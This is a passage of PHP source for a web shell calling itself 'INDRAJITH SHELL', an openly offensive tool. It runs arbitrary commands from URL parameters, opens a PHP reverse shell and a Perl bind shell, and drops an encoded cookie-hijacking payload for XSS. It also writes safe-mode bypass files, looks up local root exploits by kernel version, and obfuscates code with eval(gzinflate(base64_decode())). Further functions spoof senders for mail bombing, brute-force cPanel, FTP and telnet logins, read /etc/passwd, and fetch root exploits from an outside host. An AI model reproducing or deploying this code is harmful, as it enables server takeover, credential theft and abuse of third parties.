691. $new_dir=$_GET['new_dir'];
692. if(is_writable($_GET['path']))
693. {
694. mkdir($new_dir);
695. alert("Direcory Created Successfully");
696. exit;
697. }
698. else
699. {
700. alert("Access Denied for this Operation");
701. exit;
702. }
703. }
704. function cmd($cmd)
705. {
706. chdir($_GET['path']);
707. $res="";
708. if($_GET['cmdexe'])
709. {
710. $cmd=$_GET['cmdexe'];
711. }
712. if(function_exists('shell_exec'))
713. {
714. $res=shell_exec($cmd);
715. }
716. else if(function_exists('exec'))
717. {
718. exec($cmd,$res);
719. $res=join("\n",$res);
720. }
721. else if(function_exists('system'))
722. {
723. ob_start();
724. system($cmd);
725. $res = ob_get_contents();
726. ob_end_clean();
727. }
728. elseif(function_exists('passthru'))
729. {
730. ob_start();
731. passthru($cmd);
732. $res=ob_get_contents();
733. ob_end_clean();
734. }
735. else if(function_exists('proc_open'))
736. {
737. $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w"));
738. $handle = proc_open($cmd ,$descriptorspec , $pipes);
739. if(is_resource($handle))
740. {
741. if(function_exists('fread') && function_exists('feof'))
742. {
743. while(!feof($pipes[1]))
744. {
745. $res .= fread($pipes[1], 512);
746. }
747. }
748. else if(function_exists('fgets') && function_exists('feof'))
749. {
750. while(!feof($pipes[1]))
751. {
752. $res .= fgets($pipes[1],512);
753. }
754. }
755. }
756. pclose($handle);
757. }
758.  
759. else if(function_exists('popen'))
760. {
761. $handle = popen($cmd , "r");
762. if(is_resource($handle))
763. {
764. if(function_exists('fread') && function_exists('feof'))
765. {
766. while(!feof($handle))
767. {
768. $res .= fread($handle, 512);
769. }
770. }
771. else if(function_exists('fgets') && function_exists('feof'))
772. {
773. while(!feof($handle))
774. {
775. $res .= fgets($handle,512);
776. }
777. }
778. }
779. pclose($handle);
780. }
781.  
782. $res=wordwrap(htmlspecialchars($res));
783. if($_GET['cmdexe'])
784. {
785. echo "<div id=result><center><font color=green><h2>r00t@TOF:~#</h2></center><hr /><pre>".$res."</font></pre></div>";
786. }
787. return $res;
788. }
789. function upload_file()
790. {
791. chdir($_POST['path']);
792. if(move_uploaded_file($_FILES['upload_f']['tmp_name'],$_FILES['upload_f']['name']))
793. {
794. alert("Uploaded File Successfully");
795. }
796. else
797. {
798. alert("Access Denied!!!");
799. }
800. }
801.  
802. function reverse_conn_ui()
803. {
804. global $your_ip;
805. echo "<div id='result'>
806. <center><h2>Reverse Shell</h2><hr />
807. <br /><br /><form method='GET'><table class=tbl>
808. <tr>
809. <td><select name='rev_option' style='color:green; background-color:black; border:1px solid #666;'>
810. <option>PHP Reverse Shell</option>
811. <option>PERL Bind Shell</option>
812. </select></td></tr><tr>
813. <td>Your IP : <input name='my_ip' value=".$your_ip.">
814. PORT : <input name='my_port' value='560'>
815. <input type='submit' value=' >> ' /></td></tr></form>
816. <tr></tr>
817. <tr><td><font color=red>PHP Reverse Shell</font> : <font color=green> nc -l -p <i>port</i></font></td></tr><tr><td><font color=red>PERL Bind Shell</font> : <font color=green> nc <i>server_ip port</i></font></td></tr></table> </div>";
818. }
819. function reverse_conn_bg()
820. {
821. global $os;
822. $option=$_REQUEST['rev_option'];
823. $ip=$_GET['my_ip'];
824. $port=$_GET['my_port'];
825. if($option=="PHP Reverse Shell")
826. {
827. echo "<div id=result><h2>RESULT</h2><hr /><br />";
828. function printit ($string)
829. {
830. if (!$daemon)
831. {
832. print "$string\n";
833. }
834. }
835. $chunk_size = 1400;
836. $write_a = null;
837. $error_a = null;
838. $shell = 'uname -a; w; id; /bin/sh -i';
839. $daemon = 0;
840. $debug = 0;
841. if (function_exists('pcntl_fork'))
842. {
843. $pid = pcntl_fork();
844. if ($pid == -1)
845. {
846. printit("ERROR: Can't fork");
847. exit(1);
848. }
849. if ($pid)
850. {
851. exit(0);
852. }
853. if (posix_setsid() == -1)
854. {
855. printit("Error: Can't setsid()");
856. exit(1);
857. }
858. $daemon = 1;
859. }
860. else
861. {
862. printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
863. }
864. chdir("/");
865. umask(0);
866. $sock = fsockopen($ip, $port, $errno, $errstr, 30);
867. if (!$sock)
868. {
869. printit("$errstr ($errno)");
870. exit(1);
871. }
872. $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w"));
873. $process = proc_open($shell, $descriptorspec, $pipes);
874. if (!is_resource($process))
875. {
876. printit("ERROR: Can't spawn shell");
877. exit(1);
878. }
879. stream_set_blocking($pipes[0], 0);
880. stream_set_blocking($pipes[1], 0);
881. stream_set_blocking($pipes[2], 0);
882. stream_set_blocking($sock, 0);
883. printit("<font color=green>Successfully opened reverse shell to $ip:$port </font>");
884. while (1)
885. {
886. if (feof($sock))
887. {
888. printit("ERROR: Shell connection terminated");
889. break;
890. }
891. if (feof($pipes[1]))
892. {
893. printit("ERROR: Shell process terminated");
894. break;
895. }
896. $read_a = array($sock, $pipes[1], $pipes[2]);
897. $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
898. if (in_array($sock, $read_a))
899. {
900. if ($debug) printit("SOCK READ");
901. $input = fread($sock, $chunk_size);
902. if ($debug) printit("SOCK: $input");
903. fwrite($pipes[0], $input);
904. }
905. if (in_array($pipes[1], $read_a))
906. {
907. if ($debug) printit("STDOUT READ");
908. $input = fread($pipes[1], $chunk_size);
909. if ($debug) printit("STDOUT: $input");
910. fwrite($sock, $input);
911. }
912. if (in_array($pipes[2], $read_a))
913. {
914. if ($debug) printit("STDERR READ");
915. $input = fread($pipes[2], $chunk_size);
916. if ($debug) printit("STDERR: $input");
917. fwrite($sock, $input);
918. }
919. }
920. fclose($sock);
921. fclose($pipes[0]);
922. fclose($pipes[1]);
923. fclose($pipes[2]);
924. proc_close($process);
925. echo "<br /><br /><hr /><br /><br /></div>";
926. }
927. else if($option=="PERL Bind Shell")
928. {
929. global $bind_perl, $os;
930. $pbfl=$bind_perl;
931. $handlr=fopen("indrajith_perl_bind.pl", "wb");
932. if($handlr)
933. {
934. fwrite($handlr, gzinflate(base64_decode($bind_perl)));
935. }
936. else
937. {
938. alert("Access Denied for create new file");
939. }
940. fclose($handlr);
941. if(file_exists("indrajith_perl_bind.pl"))
942. {
943. if($os=="nix")
944. {
945. cmd("chmod +x indrajith_perl_bind.pl;perl indrajith_perl_bind.pl $port");
946. }
947. else
948. {
949. cmd("perl indrajith_perl_bind.pl $port");
950. }
951. }
952. }
953. }
954.  
955. function cookie_jack()
956. {
957. global $cookie_highjacker;
958. echo "<div id=result><center><h2>NOTICE</h2><hr/>";
959. if(function_exists('fopen') && function_exists('fwrite'))
960. {
961. $cook=gzinflate(base64_decode($cookie_highjacker));
962. $han_le=fopen("jith_cookie.php", "w+");
963. if($han_le)
964. {
965. fwrite($han_le, $cook);
966. echo "Yes... Cookie highjacker is generated.<br /> Name : <a style='color:green;' target=_blank href=jith_cookie.php>jith_cookie.php</a></font>.<br /> Rename it as 404.php or what you like and highjack cookie of your target.<br />It is usefull in XSS<br />It will make a file <font color=red>configuration.txt</font> in this direcory and save the cookie value in it. :p cheers...<br /><br /><hr /><br /><br /></center></div>";
967. }
968. else
969. {
970. echo "<font color=red>Sorry... Generate COOKIE HIGHJACKER failed<br /><br /><hr /><br /><br /></center></div>";
971. }
972. }
973. }
974.  
975.  
976.  
977. function safe_mode_fuck()
978. {
979. global $s_php_ini,$s_htaccess,$s_htaccess_pl,$ini_php;
980. $path = chdir($_GET['path']);
981. chdir($_GET['path']);
982. switch($_GET['safe_mode'])
983. {
984. case "s_php_ini":
985. $s_file=$s_php_ini;
986. $s_name="php.ini";
987. break;
988. case "s_htaccess":
989. $s_name=".htaccess";
990. $s_file=$s_htaccess;
991. break;
992. case "s_htaccess_pl":
993. $s_name=".htaccess";
994. $s_file=$s_htaccess_pl;
995. break;
996. case "s_ini_php":
997. $s_name="ini.php";
998. $s_file=$ini_php;
999. break;
1000.  
1001. }
1002. if(function_exists('fopen')&& function_exists('fwrite'))
1003. {
1004. $s_handle=fopen("$s_name", "w+");
1005. if($s_handle)
1006. {
1007. fwrite($s_handle, $s_file);
1008. alert("Operation Succeed!!!");
1009. }
1010. else
1011. {
1012. alert("Access Denied!!!");
1013. }
1014. fclose($s_handle);
1015. }
1016. }
1017. function safe_mode_fuck_ui()
1018. {
1019. global $path;
1020. $path=getcwd();
1021. echo "<div id=result><br /><center><h2>Select Your Options</h2><hr />
1022. <table class=tbl size=10><tr><td><a href=?path={$path}&amp;safe_mode=s_php_ini>PHP.INI</a></td><td><a href=?path={$path}&amp;safe_mode=s_htaccess>.HTACCESS</a></td><td><a href=?path={$path}&amp;safe_mode=s_htaccess_pl>.HTACCESS(perl)</td><td><a href=?path={$path}&amp;safe_mode=s_ini_php>INI.PHP</td></tr></table><br /><br /></div>";
1023. }
1024.  
1025.  
1026. function AccessDenied()
1027. {
1028. global $path, $forbid_dir;
1029. $path=$_GET['path'];
1030. chdir($path);
1031. if(function_exists('fopen') && function_exists('fwrite'))
1032. {
1033. $forbid=fopen(".htaccess", "wb");
1034. if($forbid)
1035. {
1036. fwrite($forbid, $forbid_dir);
1037. alert("Opreation Succeeded");
1038. }
1039. else
1040. {
1041. alert("Access Denied");
1042. }
1043. fclose($forbid);
1044. }
1045. }
1046.  
1047. function r00t_exploit()
1048. {
1049. $kernel = php_uname();
1050. $r00t_db = array('2.6.19'=>'jessica','2.6.20'=>'jessica','2.6.21'=>'jessica','2.6.22'=>'jessica','2.6.23'=>'jessica, vmsplice','2.6.24'=>'jessica, vmspice','2.6.31'=>'enlightment','2.6.18'=>'brk, ptrace, kmod, brk2','2.6.17'=>'prctl3, raptor_prctl, py2','2.6.16'=>'raptor_prctl, exp.sh, raptor, raptor2, h00lyshit','2.6.15'=>'py2, exp.sh, raptor, raptor2, h00lyshit','2.6.14'=>'raptor, raptor2, h00lyshit','2.6.13'=>'kdump, local26, py2, raptor_prctl, exp.sh, prctl3, h00lyshit','2.6.12'=>'h00lyshit','2.6.11'=>'krad3, krad, h00lyshit','2.6.10'=>'h00lyshit, stackgrow2, uselib24, exp.sh, krad, krad2','2.6.9'=>'exp.sh, krad3, py2, prctl3, h00lyshit','2.6.8'=>'h00lyshit, krad, krad2','2.6.7'=>'h00lyshit, krad, krad2','2.6.6'=>'h00lyshit, krad, krad2','2.6.2'=>'h00lyshit, krad, mremap_pte','2.6.'=>'prctl, kmdx, newsmp, pwned, ptrace_kmod, ong_bak','2.4.29'=>'elflbl, expand_stack, stackgrow2, uselib24, smpracer','2.4.27'=>'elfdump, uselib24','2.4.25'=>'uselib24','2.4.24'=>'mremap_pte, loko, uselib24','2.4.23'=>'mremap_pte, loko, uselib24','2.4.22'=>'loginx, brk, km2, loko, ptrace, uselib24, brk2, ptrace-kmod','2.4.21'=>'w00t, brk, uselib24, loginx, brk2, ptrace-kmod','2.4.20'=>'mremap_pte, w00t, brk, ave, uselib24, loginx, ptrace-kmod, ptrace, kmod','2.4.19'=>'newlocal, w00t, ave, uselib24, loginx, kmod','2.4.18'=>'km2, w00t, uselib24, loginx, kmod','2.4.17'=>'newlocal, w00t, uselib24, loginx, kmod','2.4.16'=>'w00t, uselib24, loginx','2.4.10'=>'w00t, brk, uselib24, loginx','2.4.9'=>'ptrace24, uselib24','2.4.'=>'kmdx, remap, pwned, ptrace_kmod, ong_bak','2.2.25'=>'mremap_pte','2.2.24'=>'ptrace','2.2.'=>'rip,ptrace');
1051. foreach($r00t_db as $kern=>$exp)
1052. {
1053. if(strstr($kernel, $kern))
1054. {
1055. return $exp;
1056. }
1057. else
1058. {
1059. $exp='<font color="red">Not found.</font>';
1060. return $exp;
1061. }
1062. }
1063. }
1064.  
1065. function php_ende_ui()
1066. {
1067. echo "<div id=result><center><h2>PHP ENCODE/DECODE</h2></center><hr /><form method='post'><table class=tbl>
1068. <tr><td>
1069. Method : <select name='typed' style='color:green; background-color:black; border:1px solid #666;'><option>Encode</option><option>Decode</decode></select> TYPE : <select name='typenc' style='color:green; background-color:black; border:1px solid #666;'><option>GZINFLATE</option><option>GZUNCOMPRESS</option><option>STR_ROT13</option></tr>
1070. </td><tr><td><textarea spellcheck='false' class=textarea_edit cols='80' rows='25' name='php_content'>INPUT YOUR CONTENT TO ENCODE/DECODE
1071.  
1072. For Encode Input your full source code.
1073.  
1074. For Decode Input the encoded part only.</textarea></tr></td></table><hr /><input class='input_big' type='submit' value=' >> ' /><br /><hr /><br /><br /></form></div>";
1075. }
1076. function php_ende_bg()
1077. {
1078. $meth_d=$_POST['typed'];
1079. $typ_d=$_POST['typenc'];
1080. $c_ntent=$_POST['php_content'];
1081. $c_ntent=$c_ntent;
1082. switch($meth_d)
1083. {
1084. case "Encode":
1085. switch($typ_d)
1086. {
1087. case "GZINFLATE":
1088. $res_t=base64_encode(gzdeflate(trim(stripslashes($c_ntent.' '),'<?php, ?>'),9));
1089. $res_t="<?php /* Encoded in INDRAJITH SHELL PROJECT */ eval(gzinflate(base64_decode(\"$res_t\"))); ?>";
1090. break;
1091. case "GZUNCOMPRESS":
1092. $res_t=base64_encode(gzcompress(trim(stripslashes($c_ntent.' '),'<?php, ?>'),9));
1093. $res_t="<?php /* Encoded in INDRAJITH SHELL PROJECT */ eval(gzuncompress(base64_decode(\"$res_t\"))); ?>";
1094. break;
1095. case "STR_ROT13":
1096. $res_t=trim(stripslashes($c_ntent.' '),'<?php, ?>');
1097. $res_t=base64_encode(str_rot13($res_t));
1098. $res_t="<?php /* Encoded in INDRAJITH SHELL PROJECT */ eval(str_rot13(base64_decode(\"$res_t\"))); ?>";
1099. break;
1100. }
1101. break;
1102. case "Decode":
1103. switch($typ_d)
1104. {
1105. case "GZINFLATE":
1106. $res_t=gzinflate(base64_decode($c_ntent));
1107. break;
1108. case "GZUNCOMPRESS":
1109. $res_t=gzuncompress(base64_decode($c_ntent));
1110. break;
1111. case "STR_ROT13":
1112. $res_t=str_rot13(base64_decode($c_ntent));
1113. break;
1114. }
1115. break;
1116. }
1117. echo "<div id=result><center><h2>INDRAJITH SHELL</h2><hr /><textarea spellcheck='false' class=textarea_edit cols='80' rows='25'>".htmlspecialchars($res_t)."</textarea></center></div>";
1118. }
1119.  
1120. function massmailer_ui()
1121. {
1122. echo "<div id=result><center><h2>MASS MAILER & MAIL BOMBER</h2><hr /><table class=tbl width=40 style='col-width:40'><td><table class=tbl><tr style='float:left;'><td><font color=green size=4>Mass Mail</font></td></tr><form method='POST'><tr style='float:left;'><td> FROM : </td><td><input name='from' size=40 value='ajithkp560@fbi.gov'></td></tr><tr style='float:left;'><td>TO :</td><td><input size=40 name='to_mail' value='ajithkp560@gmail.com,ajithkp560@yahoo.com'></td></tr><tr style='float:left;'><td>Subject :</td><td><input size=40 name='subject_mail' value='Hi, GuyZ'></td></tr><tr style='float:left;'><td><textarea spellcheck='false' class=textarea_edit cols='34' rows='10' name='mail_content'>I'm doing massmail :p</textarea></td><td><input class='input_big' type='submit' value=' >> '></td></tr></form></table></td>
1123. <form method='post'><td> <table class='tbl'><td><font color=green size=4>Mail Bomber</font></td></tr><tr style='float:left;'><td>TO : </td><td><input size=40 name='bomb_to' value='ajithkp560@gmail.com,ajithkp560_mail_bomb@fbi.gov'></td></tr><tr style='float:left;'><td>Subject : </td><td><input size=40 name='bomb_subject' value='Bombing with messages'></td></tr><tr style='float:left;'><td>No. of times</td><td><input size=40 name='bomb_no' value='100'></td></tr><tr style='float:left;'><td> <textarea spellcheck='false' class=textarea_edit cols='34' rows='10' name='bmail_content'>I'm doing E-Mail Bombing :p</textarea> </td><td><input class='input_big' type='submit' value=' >> '></td></tr></form></table> </td></tr></table>";
1124. }
1125.  
1126. function massmailer_bg()
1127. {
1128. $from=$_POST['from'];
1129. $to=$_POST['to_mail'];
1130. $subject=$_POST['subject_mail'];
1131. $message=$_POST['mail_content'];
1132. if(function_exists('mail'))
1133. {
1134. if(mail($to,$subject,$message,"From:$from"))
1135. {
1136. echo "<div id=result><center><h2>MAIL BOMBING</h2><hr /><br /><br /><font color=green size=4>Successfully Mails Send... :p</font><br /><br /><hr /><br /><br />";
1137. }
1138. else
1139. {
1140. echo "<div id=result><center><h2>MAIL BOMBING</h2><hr /><br /><br /><font color=red size=4>Sorry, failed to Mails Sending... :(</font><br /><br /><hr /><br /><br />";
1141. }
1142. }
1143. else
1144. {
1145. echo "<div id=result><center><h2>MAIL BOMBING</h2><hr /><br /><br /><font color=red size=4>Sorry, failed to Mails Sending... :(</font><br /><br /><hr /><br /><br />";
1146. }
1147. }
1148.  
1149. function mailbomb_bg()
1150. {
1151. $rand=rand(0, 9999999);
1152. $to=$_POST['bomb_to'];
1153. $from="president_$rand@whitewhitehouse.gov";
1154. $subject=$_POST['bomb_subject']." ID ".$rand;
1155. $times=$_POST['bomb_no'];
1156. $content=$_POST['bmail_content'];
1157. if($times=='')
1158. {
1159. $times=1000;
1160. }
1161. while($times--)
1162. {
1163. if(function_exists('mail'))
1164. {
1165. if(mail($to,$subject,$message,"From:$from"))
1166. {
1167. echo "<div id=result><center><h2>MAIL BOMBING</h2><hr /><br /><br /><font color=green size=4>Successfully Mails Bombed... :p</font><br /><br /><hr /><br /><br />";
1168. }
1169. else
1170. {
1171. echo "<div id=result><center><h2>MAIL BOMBING</h2><hr /><br /><br /><font color=red size=4>Sorry, failed to Mails Bombing... :(</font><br /><br /><hr /><br /><br />";
1172. }
1173. }
1174. else
1175. {
1176. echo "<div id=result><center><h2>MAIL BOMBING</h2><hr /><br /><br /><font color=red size=4>Sorry, failed to Mails Bombing... :(</font><br /><br /><hr /><br /><br />";
1177. }
1178. }
1179. }
1180. /* ----------------------- CPANEL CRACK is Copied from cpanel cracker ----------*/
1181. /*------------------------ Credit Goes to Them ---------------------------------*/
1182. function cpanel_check($host,$user,$pass,$timeout)
1183. {
1184. set_time_limit(0);
1185. global $cpanel_port;
1186. $ch = curl_init();
1187. curl_setopt($ch, CURLOPT_URL, "http://$host:" . $cpanel_port);
1188. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1189. curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
1190. curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
1191. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
1192. curl_setopt($ch, CURLOPT_FAILONERROR, 1);
1193. $data = curl_exec($ch);
1194. if ( curl_errno($ch) == 28 )
1195. {
1196. print "<b><font color=orange>Error :</font> <font color=red>Connection Timeout. Please Check The Target Hostname .</font></b>";
1197. exit;
1198. }
1199. else if (curl_errno($ch) == 0 )
1200. {
1201. print "<b><font face=\"Tahoma\" style=\"font-size: 9pt\" color=\"orange\">[~]</font></b><font face=\"Tahoma\" style=\"font-size: 9pt\"><b><font color=\"green\">
1202. Cracking Success With Username &quot;</font><font color=\"#FF0000\">$user</font><font color=\"#008000\">\" and Password \"</font><font color=\"#FF0000\">$pass</font><font color=\"#008000\">\"</font></b><br><br>";
1203. }
1204. curl_close($ch);
1205. }
1206.  
1207. function cpanel_crack()
1208. {
1209. set_time_limit(0);
1210. global $os;
1211. echo "<div id=result>";
1212. $cpanel_port="2082";
1213. $connect_timeout=5;
1214. if(!isset($_POST['username']) && !isset($_POST['password']) && !isset($_POST['target']) && !isset($_POST['cracktype']))
1215. {
1216. ?>
1217. <center>
1218. <form method=post>
1219. <table class=tbl>
1220. <tr>
1221. <td align=center colspan=2>Target : <input type=text name="server" value="localhost" class=sbox></td>
1222. </tr>
1223. <tr>
1224. <td align=center>User names</td><td align=center>Password</td>
1225. </tr>
1226. <tr>
1227. <td align=center><textarea spellcheck='false' class=textarea_edit name=username rows=25 cols=35 class=box><?php
1228. if($os != "win")
1229. {
1230. if(@file('/etc/passwd'))
1231. {
1232. $users = file('/etc/passwd');
1233. foreach($users as $user)
1234. {
1235. $user = explode(':', $user);
1236. echo $user[0] . "\n";
1237. }
1238. }
1239. else
1240. {
1241. $temp = "";
1242. $val1 = 0;
1243. $val2 = 1000;
1244. for(;$val1 <= $val2;$val1++)
1245. {
1246. $uid = @posix_getpwuid($val1);
1247. if ($uid)
1248. $temp .= join(':',$uid)."\n";
1249. }
1250.  
1251. $temp = trim($temp);
1252.  
1253. if($file5 = fopen("test.txt","w"))
1254. {
1255. fputs($file5,$temp);
1256. fclose($file5);
1257.  
1258. $file = fopen("test.txt", "r");
1259. while(!feof($file))
1260. {
1261. $s = fgets($file);
1262. $matches = array();
1263. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
1264. $matches = str_replace("home/","",$matches[1]);
1265. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
1266. continue;
1267. echo $matches;
1268. }
1269. fclose($file);
1270. }
1271. }
1272. }
1273. ?></textarea></td><td align=center><textarea spellcheck='false' class=textarea_edit name=password rows=25 cols=35 class=box></textarea></td>
1274. </tr>
1275. <tr>
1276. <td align=center colspan=2>Guess options : <label><input name="cracktype" type="radio" value="cpanel" checked> Cpanel(2082)</label><label><input name="cracktype" type="radio" value="ftp"> Ftp(21)</label><label><input name="cracktype" type="radio" value="telnet"> Telnet(23)</label></td>
1277. </tr>
1278. <tr>
1279. <td align=center colspan=2>Timeout delay : <input type="text" name="delay" value=5 class=sbox></td>
1280. </tr>
1281. <tr>
1282. <td align=center colspan=2><input type="submit" value=" Go " class=but></td>
1283. </tr>
1284. </table>
1285. </form>
1286. </center>
1287. <?php
1288. }
1289. else
1290. {
1291. if(empty($_POST['username']) || empty($_POST['password']))
1292. echo "<center>Please Enter The Users or Password List</center>";
1293. else
1294. {
1295. $userlist=explode("\n",$_POST['username']);
1296. $passlist=explode("\n",$_POST['password']);
1297.  
1298. if($_POST['cracktype'] == "ftp")
1299. {
1300. foreach ($userlist as $user)
1301. {
1302. $pureuser = trim($user);
1303. foreach ($passlist as $password )
1304. {
1305. $purepass = trim($password);
1306. ftp_check($_POST['target'],$pureuser,$purepass,$connect_timeout);
1307. }
1308. }
1309. }
1310. if ($_POST['cracktype'] == "cpanel" || $_POST['cracktype'] == "telnet")
1311. {
1312. if($cracktype == "telnet")
1313. {
1314. $cpanel_port="23";
1315. }
1316. else
1317. $cpanel_port="2082";
1318. foreach ($userlist as $user)
1319. {
1320. $pureuser = trim($user);
1321. echo "<b><font face=Tahoma style=\"font-size: 9pt\" color=#008000> [ - ] </font><font face=Tahoma style=\"font-size: 9pt\" color=#FF0800>
1322. Processing user $pureuser ...</font></b><br><br>";
1323. foreach ($passlist as $password )
1324. {
1325. $purepass = trim($password);
1326. cpanel_check($_POST['target'],$pureuser,$purepass,$connect_timeout);
1327. }
1328. }
1329. }
1330. }
1331. }
1332.  
1333. echo "</div>";
1334. }
1335.  
1336. function get_users()
1337. {
1338. $userz = array();
1339. $user = file("/etc/passwd");
1340. foreach($user as $userx=>$usersz)
1341. {
1342. $userct = explode(":",$usersz);
1343. array_push($userz,$userct[0]);
1344. }
1345. if(!$user)
1346. {
1347. if($opd = opendir("/home/"))
1348. {
1349. while(($file = readdir($opd))!== false)
1350. {
1351. array_push($userz,$file);
1352. }
1353. }
1354. closedir($opd);
1355. }
1356. $userz=implode(', ',$userz);
1357. return $userz;
1358. }
1359.  
1360. function exploit_details()
1361. {
1362. global $os;
1363. echo "<div id=result style='color:green;'><center>
1364. <h2>Exploit Server Details</h2><hr /><br /><br /><table class=table style='color:green;text-align:center'><tr><td>
1365. OS: <a style='color:7171C6;text-decoration:none;' target=_blank href='http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=".php_uname(s)."'>".php_uname(s)."</td></tr>
1366. <tr><td>PHP Version : <a style='color:7171C6;text-decoration:none;' target=_blank href='?phpinfo'>".phpversion().".</td></tr>
1367. <tr><td>Kernel Release : <font color=7171C6>".php_uname(r)."</font></td></tr>
1368. <tr><td>Kernel Version : <font color=7171C6>".php_uname(v)."</font></td></td>
1369. <tr><td>Machine : <font color=7171C6>".php_uname(m)."</font></td</tr>
1370. <tr><td>Server Software : <font color=7171C6>".$_SERVER['SERVER_SOFTWARE']."</font></td</tr><tr>";
1371. if(function_exists('apache_get_modules'))
1372. {
1373. echo "<tr><td style='text-align:left;'>Loaded Apache modules : <br /><br /><font color=7171C6>";
1374. echo implode(', ', apache_get_modules());
1375. echo "</font></tr></td>";
1376. }
1377. if($os=='win')
1378. {
1379. echo "<tr><td style='text-align:left;'>Account Setting : <font color=7171C6><pre>".cmd('net accounts')."</pre></td></tr>
1380. <tr><td style='text-align:left'>User Accounts : <font color=7171C6><pre>".cmd('net user')."</pre></td></tr>
1381. ";
1382. }
1383. if($os=='nix')
1384. {
1385. echo "<tr><td style='text-align:left'>Distro : <font color=7171C6><pre>".cmd('cat /etc/*-release')."</pre></font></td></tr>
1386. <tr><td style='text-align:left'>Distr name : <font color=7171C6><pre>".cmd('cat /etc/issue.net')."</pre></font></td></tr>
1387. <tr><td style='text-align:left'>GCC : <font color=7171C6><pre>".cmd('whereis gcc')."</pre></td></tr>
1388. <tr><td style='text-align:left'>PERL : <font color=7171C6><pre>".cmd('whereis perl')."</pre></td></tr>
1389. <tr><td style='text-align:left'>PYTHON : <font color=7171C6><pre>".cmd('whereis python')."</pre></td></tr>
1390. <tr><td style='text-align:left'>JAVA : <font color=7171C6><pre>".cmd('whereis java')."</pre></td></tr>
1391. <tr><td style='text-align:left'>APACHE : <font color=7171C6><pre>".cmd('whereis apache')."</pre></td></tr>
1392. <tr><td style='text-align:left;'>CPU : <br /><br /><pre><font color=7171C6>".cmd('cat /proc/cpuinfo')."</font></pre></td></tr>
1393. <tr><td style='text-align:left'>RAM : <font color=7171C6><pre>".cmd('free -m')."</pre></td></tr>
1394. <tr><td style='text-align:left'> User Limits : <br /><br /><font color=7171C6><pre>".cmd('ulimit -a')."</pre></td></tr>";
1395. $useful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
1396. $uze=array();
1397. foreach($useful as $uzeful)
1398. {
1399. if(cmd("which $uzeful"))
1400. {
1401. $uze[]=$uzeful;
1402. }
1403. }
1404. echo "<tr><td style='text-align:left'>Useful : <br /><font color=7171C6><pre>";
1405. echo implode(', ',$uze);
1406. echo "</pre></td></tr>";
1407. $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
1408. $uze=array();
1409. foreach($downloaders as $downloader)
1410. {
1411. if(cmd("which $downloader"))
1412. {
1413. $uze[]=$downloader;
1414. }
1415. }
1416. echo "<tr><td style='text-align:left'>Downloaders : <br /><font color=7171C6><pre>";
1417. echo implode(', ',$uze);
1418. echo "</pre></td></tr>";
1419. echo "<tr><td style='text-align:left'>Users : <br /><font color=7171C6><pre>".wordwrap(get_users())."</pre</font>></td></tr>
1420. <tr><td style='text-align:left'>Hosts : <br /><font color=7171C6><pre>".cmd('cat /etc/hosts')."</pre></font></td></tr>";
1421. }
1422. echo "</table><br /><br /><hr /><br /><br />";
1423. }
1424.  
1425. function remote_file_check_ui()
1426. {
1427. echo "<div id=result><center><h2>Remote File Check</h2><hr /><br /><br />
1428. <table class=tbl><form method='POST'><tr><td>URL : <input size=50 name='rem_web' value='http://www.ajithkp560.hostei.com/php/'></td></tr>
1429. <tr><td><font color=red>Input File's Names in TextArea</font></tr></td><tr><td><textarea spellcheck='false' class='textarea_edit' cols=50 rows=30 name='tryzzz'>indrajith.php
1430. ajithkp560.php
1431. index.html
1432. profile.php
1433. c99.php
1434. r57.php</textarea></td></tr>
1435. <tr><td><br /><input type='submit' value=' >> ' class='input_big' /><br /><br /></td></tr></form></table><br /><br /><hr /><br /><br />";
1436. }
1437.  
1438. function remote_file_check_bg()
1439. {
1440. set_time_limit(0);
1441. $rtr=array();
1442. echo "<div id=result><center><h2>Scanner Report</h2><hr /><br /><br /><table class=tbl>";
1443. $webz=$_POST['rem_web'];
1444. $uri_in=$_POST['tryzzz'];
1445. $r_xuri = trim($uri_in);
1446. $r_xuri=explode("\n", $r_xuri);
1447. foreach($r_xuri as $rty)
1448. {
1449. $urlzzx=$webz.$rty;
1450. if(function_exists('curl_init'))
1451. {
1452. echo "<tr><td style='text-align:left'><font color=orange>Checking : </font> <font color=7171C6> $urlzzx </font></td>";
1453. $ch = curl_init($urlzzx);
1454. curl_setopt($ch, CURLOPT_NOBODY, true);
1455. curl_exec($ch);
1456. $status_code=curl_getinfo($ch, CURLINFO_HTTP_CODE);
1457. curl_close($ch);
1458. if($status_code==200)
1459. {
1460. echo "<td style='text-align:left'><font color=green> Found....</font></td></tr>";
1461. }
1462. else
1463. {
1464. echo "<td style='text-align:left'><font color=red>Not Found...</font></td></tr>";
1465. }
1466. }
1467. else
1468. {
1469. echo "<font color=red>cURL Not Found </font>";
1470. break;
1471. }
1472. }
1473. echo "</table><br /><br /><hr /><br /><br /></div>";
1474. }
1475.  
1476. function remote_download_ui()
1477. {
1478. echo "<div id=result><center><h2>Remote File Download</h2><hr /><br /><br /><table class=tbl><form method='GET'><input type=hidden name='path' value=".getcwd()."><tr><td><select style='color:green; background-color:black; border:1px solid #666;' name='type_r_down'><option>WGET</option><option>cURL</option></select></td></tr>
1479. <tr><td>URL <input size=50 name='rurlfile' value='ajithkp560.hostei.com/localroot/2.6.x/h00lyshit.zip'></td></tr>
1480. <tr><td><input type='submit' class='input_big' value=' >> ' /></td></tr></form></table><br /><br /><hr /><br /><br /></div>";
1481. }
1482.  
1483. function remote_download_bg()
1484. {
1485. chdir($_GET['path']);
1486. global $os;
1487. $opt=$_GET['type_r_down'];
